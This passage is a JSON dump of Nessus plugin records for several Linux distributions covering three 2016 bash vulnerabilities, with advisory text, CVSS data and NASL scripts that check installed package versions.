exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo / bash-doc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:35:41", "description": "From Red Hat Security Advisory 2017:1931 :\n\nAn update for bash is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe bash packages provide Bash (Bourne-again shell), which is the default shell for Red Hat Enterprise Linux.\n\nSecurity Fix(es) :\n\n* An arbitrary command injection flaw was found in the way bash processed the hostname value. A malicious DHCP server could use this flaw to execute arbitrary commands on the DHCP client machines running bash under specific circumstances. (CVE-2016-0634)\n\n* An arbitrary command injection flaw was found in the way bash processed the SHELLOPTS and PS4 environment variables. A local, authenticated attacker could use this flaw to exploit poorly written setuid programs to elevate their privileges under certain circumstances. (CVE-2016-7543)\n\n* A denial of service flaw was found in the way bash handled popd commands. A poorly written shell script could cause bash to crash resulting in a local denial of service limited to a specific bash session. (CVE-2016-9401)\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.4 Release Notes linked from the References section.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-08-09T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : bash (ELSA-2017-1931)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0634", "CVE-2016-7543", "CVE-2016-9401"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "p-cpe:/a:oracle:linux:bash-doc", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2017-1931.NASL", "href": "https://www.tenable.com/plugins/nessus/102289", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2017:1931 and \n# Oracle Linux Security Advisory ELSA-2017-1931 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102289);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-0634\", \"CVE-2016-7543\", \"CVE-2016-9401\");\n script_xref(name:\"RHSA\", value:\"2017:1931\");\n\n script_name(english:\"Oracle Linux 7 : bash (ELSA-2017-1931)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2017:1931 :\n\nAn update for bash is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe bash packages provide Bash (Bourne-again shell), which is the\ndefault shell for Red Hat Enterprise Linux.\n\nSecurity Fix(es) :\n\n* An arbitrary command injection flaw was found in the way bash\nprocessed the hostname value. A malicious DHCP server could use this\nflaw to execute arbitrary commands on the DHCP client machines running\nbash under specific circumstances. (CVE-2016-0634)\n\n* An arbitrary command injection flaw was found in the way bash\nprocessed the SHELLOPTS and PS4 environment variables. A local,\nauthenticated attacker could use this flaw to exploit poorly written\nsetuid programs to elevate their privileges under certain\ncircumstances. (CVE-2016-7543)\n\n* A denial of service flaw was found in the way bash handled popd\ncommands. A poorly written shell script could cause bash to crash\nresulting in a local denial of service limited to a specific bash\nsession. (CVE-2016-9401)\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.4 Release Notes linked from the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-August/007079.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bash-4.2.46-28.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bash-doc-4.2.46-28.el7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-doc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:35:21", "description": "popd controlled free :\n\nA denial of service flaw was found in the way bash handled popd commands. A poorly written shell script could cause bash to crash resulting in a local denial of service limited to a specific bash session.(CVE-2016-9401)\n\nArbitrary code execution via malicious hostname :\n\nAn arbitrary command injection flaw was found in the way bash processed the hostname value. A malicious DHCP server could use this flaw to execute arbitrary commands on the DHCP client machines running bash under specific circumstances.(CVE-2016-0634)\n\nSpecially crafted SHELLOPTS+PS4 variables allows command substitution :\n\nAn arbitrary command injection flaw was found in the way bash processed the SHELLOPTS and PS4 environment variables. A local, authenticated attacker could use this flaw to exploit poorly written setuid programs to elevate their privileges under certain circumstances. (CVE-2016-7543)", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-09-01T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : bash (ALAS-2017-878)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0634", "CVE-2016-7543", "CVE-2016-9401"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:bash", "p-cpe:/a:amazon:linux:bash-debuginfo", "p-cpe:/a:amazon:linux:bash-doc", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2017-878.NASL", "href": "https://www.tenable.com/plugins/nessus/102866", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2017-878.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102866);\n script_version(\"3.2\");\n script_cvs_date(\"Date: 2018/04/18 15:09:36\");\n\n script_cve_id(\"CVE-2016-0634\", \"CVE-2016-7543\", \"CVE-2016-9401\");\n script_xref(name:\"ALAS\", value:\"2017-878\");\n\n script_name(english:\"Amazon Linux AMI : bash (ALAS-2017-878)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"popd controlled free :\n\nA denial of service flaw was found in the way bash handled popd\ncommands. A poorly written shell script could cause bash to crash\nresulting in a local denial of service limited to a specific bash\nsession.(CVE-2016-9401)\n\nArbitrary code execution via malicious hostname :\n\nAn arbitrary command injection flaw was found in the way bash\nprocessed the hostname value. A malicious DHCP server could use this\nflaw to execute arbitrary commands on the DHCP client machines running\nbash under specific circumstances.(CVE-2016-0634)\n\nSpecially crafted SHELLOPTS+PS4 variables allows command \nsubstitution :\n\nAn arbitrary command injection flaw was found in the way bash\nprocessed the SHELLOPTS and PS4 environment variables. A local,\nauthenticated attacker could use this flaw to exploit poorly written\nsetuid programs to elevate their privileges under certain\ncircumstances. (CVE-2016-7543)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2017-878.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update bash' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"bash-4.2.46-28.37.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"bash-debuginfo-4.2.46-28.37.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"bash-doc-4.2.46-28.37.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo / bash-doc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:20:46", "description": "The remote NewStart CGSL host, running version MAIN 4.05, has bash packages installed that are affected by multiple vulnerabilities:\n\n - A denial of service flaw was found in the way bash handled popd commands. A poorly written shell script could cause bash to crash resulting in a local denial of service limited to a specific bash session.\n (CVE-2016-9401)\n\n - An arbitrary command injection flaw was found in the way bash processed the SHELLOPTS and PS4 environment variables. A local, authenticated attacker could use this flaw to exploit poorly written setuid programs to elevate their privileges under certain circumstances.\n (CVE-2016-7543)\n\n - An arbitrary command injection flaw was found in the way bash processed the hostname value. A malicious DHCP server could use this flaw to execute arbitrary commands on the DHCP client machines running bash under specific circumstances. (CVE-2016-0634)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-08-12T00:00:00", "type": "nessus", "title": "NewStart CGSL MAIN 4.05 : bash Multiple Vulnerabilities (NS-SA-2019-0108)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0634", "CVE-2016-7543", "CVE-2016-9401"], "modified": "2021-01-14T00:00:00", "cpe": [], "id": "NEWSTART_CGSL_NS-SA-2019-0108_BASH.NASL", "href": "https://www.tenable.com/plugins/nessus/127342", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2019-0108. The text\n# itself is copyright (C) ZTE, Inc.\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(127342);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-0634\", \"CVE-2016-7543\", \"CVE-2016-9401\");\n\n script_name(english:\"NewStart CGSL MAIN 4.05 : bash Multiple Vulnerabilities (NS-SA-2019-0108)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote machine is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version MAIN 4.05, has bash packages installed that are affected by multiple\nvulnerabilities:\n\n - A denial of service flaw was found in the way bash\n handled popd commands. A poorly written shell script\n could cause bash to crash resulting in a local denial of\n service limited to a specific bash session.\n (CVE-2016-9401)\n\n - An arbitrary command injection flaw was found in the way\n bash processed the SHELLOPTS and PS4 environment\n variables. A local, authenticated attacker could use\n this flaw to exploit poorly written setuid programs to\n elevate their privileges under certain circumstances.\n (CVE-2016-7543)\n\n - An arbitrary command injection flaw was found in the way\n bash processed the hostname value. A malicious DHCP\n server could use this flaw to execute arbitrary commands\n on the DHCP client machines running bash under specific\n circumstances. (CVE-2016-0634)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2019-0108\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL bash packages. Note that updated packages may not be available yet. Please contact ZTE for\nmore information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-7543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/ZTE-CGSL/release\");\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, \"NewStart Carrier Grade Server Linux\");\n\nif (release !~ \"CGSL MAIN 4.05\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL MAIN 4.05');\n\nif (!get_kb_item(\"Host/ZTE-CGSL/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"NewStart Carrier Grade Server Linux\", cpu);\n\nflag = 0;\n\npkgs = {\n \"CGSL MAIN 4.05\": [\n \"bash-4.1.2-48.el6\"\n ]\n};\npkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:\"ZTE \" + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:35:58", "description": "An update for bash is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe bash packages provide Bash (Bourne-again shell), which is the default shell for Red Hat Enterprise Linux.\n\nSecurity Fix(es) :\n\n* An arbitrary command injection flaw was found in the way bash processed the hostname value. A malicious DHCP server could use this flaw to execute arbitrary commands on the DHCP client machines running bash under specific circumstances. (CVE-2016-0634)\n\n* An arbitrary command injection flaw was found in the way bash processed the SHELLOPTS and PS4 environment variables. A local, authenticated attacker could use this flaw to exploit poorly written setuid programs to elevate their privileges under certain circumstances. (CVE-2016-7543)\n\n* A denial of service flaw was found in the way bash handled popd commands. A poorly written shell script could cause bash to crash resulting in a local denial of service limited to a specific bash session. (CVE-2016-9401)\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.4 Release Notes linked from the References section.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-08-02T00:00:00", "type": "nessus", "title": "RHEL 7 : bash (RHSA-2017:1931)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0634", "CVE-2016-7543", "CVE-2016-9401"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:bash", "p-cpe:/a:redhat:enterprise_linux:bash-debuginfo", "p-cpe:/a:redhat:enterprise_linux:bash-doc", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2017-1931.NASL", "href": "https://www.tenable.com/plugins/nessus/102105", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:1931. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102105);\n script_version(\"3.12\");\n script_cvs_date(\"Date: 2019/10/24 15:35:43\");\n\n script_cve_id(\"CVE-2016-0634\", \"CVE-2016-7543\", \"CVE-2016-9401\");\n script_xref(name:\"RHSA\", value:\"2017:1931\");\n\n script_name(english:\"RHEL 7 : bash (RHSA-2017:1931)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for bash is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe bash packages provide Bash (Bourne-again shell), which is the\ndefault shell for Red Hat Enterprise Linux.\n\nSecurity Fix(es) :\n\n* An arbitrary command injection flaw was found in the way bash\nprocessed the hostname value. A malicious DHCP server could use this\nflaw to execute arbitrary commands on the DHCP client machines running\nbash under specific circumstances. (CVE-2016-0634)\n\n* An arbitrary command injection flaw was found in the way bash\nprocessed the SHELLOPTS and PS4 environment variables. A local,\nauthenticated attacker could use this flaw to exploit poorly written\nsetuid programs to elevate their privileges under certain\ncircumstances. (CVE-2016-7543)\n\n* A denial of service flaw was found in the way bash handled popd\ncommands. A poorly written shell script could cause bash to crash\nresulting in a local denial of service limited to a specific bash\nsession. (CVE-2016-9401)\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.4 Release Notes linked from the References section.\"\n );\n # https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/7/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3395ff0b\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:1931\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0634\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-7543\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9401\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bash, bash-debuginfo and / or bash-doc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:1931\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bash-4.2.46-28.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bash-4.2.46-28.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bash-debuginfo-4.2.46-28.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bash-debuginfo-4.2.46-28.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bash-doc-4.2.46-28.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bash-doc-4.2.46-28.el7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo / 